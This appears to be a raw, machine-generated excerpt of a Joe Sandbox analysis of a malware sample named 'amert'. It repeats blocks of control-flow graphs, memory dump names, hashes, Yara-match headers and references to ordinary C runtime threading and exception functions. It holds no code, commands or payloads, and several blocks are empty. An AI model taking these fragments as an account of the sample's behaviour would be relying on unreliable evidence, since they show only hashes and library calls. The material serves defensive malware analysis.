                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 620 4fc02a3-4fc02a8 621 4fc02aa-4fc02b2 620->621 622 4fc0321-4fc032a 620->622 623 4fc02b9-4fc02bc 621->623 624 4fc02b4-4fc02b5 621->624 625 4fc032c-4fc0331 622->625 626 4fc0357-4fc0361 622->626 628 4fc02c5 623->628 624->628 627 4fc0342-4fc0355 625->627 626->627 629 4fc0363 626->629 630 4fc0365-4fc0486 627->630 628->628 629->630 644 4fc048d-4fc0503 630->644
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 650 4fc02f7-4fc0486 667 4fc048d-4fc0503 650->667
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 673 4fc0319-4fc032a 674 4fc032c-4fc0331 673->674 675 4fc0357-4fc0361 673->675 676 4fc0342-4fc0355 674->676 675->676 677 4fc0363 675->677 678 4fc0365-4fc0486 676->678 677->678 692 4fc048d-4fc0503 678->692
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 698 4fc0336-4fc0486 713 4fc048d-4fc0503 698->713
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 719 4fc035a-4fc0361 720 4fc0342-4fc0355 719->720 721 4fc0363 719->721 722 4fc0365-4fc0486 720->722 721->722 736 4fc048d-4fc0503 722->736
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0036239E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2659868963-0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 57040152-0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: 60735a2b3d8a19b5ec3263d80d63aa1a12afb499e45a73ee7e50ca8e822f7c96
                                                                                                                                                                                                                                        • Instruction ID: 7f31ef87cea61506587319932342397c92d2757d63e4d1669d3a160bcf252d9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60735a2b3d8a19b5ec3263d80d63aa1a12afb499e45a73ee7e50ca8e822f7c96
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D101D63BA15621266F17211AAC23BFB57988B86BB4727002EFD44FB5C1FF55DC0241A4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00362726
                                                                                                                                                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 003627C0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2970364248-111699406
                                                                                                                                                                                                                                        • Opcode ID: a48cce0cbcb4e206330b353420fc96cd15deeab3f7570225171cf6521a1c716a
                                                                                                                                                                                                                                        • Instruction ID: a9cbba3618aa7511946a48d0ddcffbd3c27212a4bc2ede41de5bfd1f4f21f9ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a48cce0cbcb4e206330b353420fc96cd15deeab3f7570225171cf6521a1c716a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92719071E102089FDF16CFA8C881BDEFBB4EF59310F14812DE805AB285D774A944CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0037744C
                                                                                                                                                                                                                                        • __Cnd_destroy_in_situ.LIBCPMT ref: 00377458
                                                                                                                                                                                                                                        • __Mtx_destroy_in_situ.LIBCPMT ref: 00377461
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                        • String ID: 0t7
                                                                                                                                                                                                                                        • API String ID: 4078500453-683943295
                                                                                                                                                                                                                                        • Opcode ID: 16106e7938e6eeb2ed7cbb4f357decdfa45c44620c9d58214a70eedf45d85ffb
                                                                                                                                                                                                                                        • Instruction ID: 831340dc768d876c23070ec79f4d876c60a7a68df41c91cf080a17f06b56b4c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16106e7938e6eeb2ed7cbb4f357decdfa45c44620c9d58214a70eedf45d85ffb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5531E5B1A047049BE732DF68D841A5AF7E8EF04350F108A3EE949CB641E779EA54C7E1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00362A43
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: This function cannot be called on a default constructed task$p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2659868963-5733453
                                                                                                                                                                                                                                        • Opcode ID: 4b269452639302417e2cbafe3f60410eb3adc190d2d01bd25546461fa0a149b6
                                                                                                                                                                                                                                        • Instruction ID: 8a16a7f56d14d1fe147087a9664517a479620a8dbd229c771980608d94cd1686
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b269452639302417e2cbafe3f60410eb3adc190d2d01bd25546461fa0a149b6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F0F670D1030C9BC712DFA8D8419DEFBECDF56304F1086ADF8549B601EB70AA548794
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 003793AF
                                                                                                                                                                                                                                        • __Cnd_destroy_in_situ.LIBCPMT ref: 003793BB
                                                                                                                                                                                                                                        • __Mtx_destroy_in_situ.LIBCPMT ref: 003793C4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                        • String ID: 0t7
                                                                                                                                                                                                                                        • API String ID: 4078500453-683943295
                                                                                                                                                                                                                                        • Opcode ID: 042fa3691f3afc0f9cdefc13332f77762830022b51d9104f5c3c85b31631ca75
                                                                                                                                                                                                                                        • Instruction ID: 8933d4feafff16defba2d22918e2985c1f1dbe8aa473b171ee0ee26e020c028c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 042fa3691f3afc0f9cdefc13332f77762830022b51d9104f5c3c85b31631ca75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13F04FB6900B009BDA35DB64E449B9BB3ECAF44301F05891EE69ACB940D778E588CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: c2189248270ea340cbd842f54171ce7f18cb959cd5409b5c13150a41ec3c7c18
                                                                                                                                                                                                                                        • Instruction ID: dba7e7ae29b56b5875272a01415a455ab1b0bd0a9f37e8246889249125046092
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2189248270ea340cbd842f54171ce7f18cb959cd5409b5c13150a41ec3c7c18
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FB14832A242859FDF13CF29C8917BEBBF5EF56340F16916AE8459B342D6389D01CB60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 9d509e5301b94853f5ae8137573dea76e83cc6a95a9a1bbe50b74d81852c42a0
                                                                                                                                                                                                                                        • Instruction ID: 46fd0107e4f4bc92c60b1003f627a90a202a768d29deb1befe7400665b69d601
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d509e5301b94853f5ae8137573dea76e83cc6a95a9a1bbe50b74d81852c42a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4621837590020DAFDF12EFA4CC41ABEBBB8EF09710F004019F505BB251D7399D019B91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __Mtx_init_in_situ.LIBCPMT ref: 00376CDC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_init_in_situ
                                                                                                                                                                                                                                        • String ID: Pu7$`-6
                                                                                                                                                                                                                                        • API String ID: 3366076730-2118185490
                                                                                                                                                                                                                                        • Opcode ID: e1bc5a2c75cbdf45bbbc04d27554c5b002dd45830f82bb15e044b7d01b066434
                                                                                                                                                                                                                                        • Instruction ID: 7345348988cf6aa906f82ea05d1fce316ff54a2542a5ddbd70e9433dc96d9388
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1bc5a2c75cbdf45bbbc04d27554c5b002dd45830f82bb15e044b7d01b066434
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A148B4A01B158FDB22CF69C895B9EBBF0EF49700F198159E819AB351E7799D01CF80
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 0-111699406
                                                                                                                                                                                                                                        • Opcode ID: c6fe4f1744d321aa517bd6f18b1f550fbb7845caa7fbf11b9a2074c244113344
                                                                                                                                                                                                                                        • Instruction ID: f83b4d03f03c0eb91aaaae5d44486e940a6502de610198da07ce100fb0f7690f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6fe4f1744d321aa517bd6f18b1f550fbb7845caa7fbf11b9a2074c244113344
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E511972A001189BCF26DFACCC459AEB7A8EF45350F158679E919EB341DB34EE10C791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0036239E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2659868963-111699406
                                                                                                                                                                                                                                        • Opcode ID: 62b42e79d86f5d1d3d56e373717bffc79ecdc30018bc5d4d0377fb8d949b0864
                                                                                                                                                                                                                                        • Instruction ID: 2ccc9a989b0b2febe563d0a96f6623769e60355fb7fe288d95195be9fdf1846f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62b42e79d86f5d1d3d56e373717bffc79ecdc30018bc5d4d0377fb8d949b0864
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0E5B9C1020C6BCB15EFE8DC428CAB7ACDE12300B508935F654EB500F7B0F6488791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00362472
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2659868963-111699406
                                                                                                                                                                                                                                        • Opcode ID: d25f0bce36d7359d5291e371303660d45e92c0c396de68ae9a7b7791c7f8fb5a
                                                                                                                                                                                                                                        • Instruction ID: 7cba00a89707369ee7f0810c6a8c69eea6dcb62c00eb55f64034764654449552
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d25f0bce36d7359d5291e371303660d45e92c0c396de68ae9a7b7791c7f8fb5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F0A775D1020DEFC715DFA8D8419CEBBF8EF56300F1082BEE445AB201EB716A548B95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%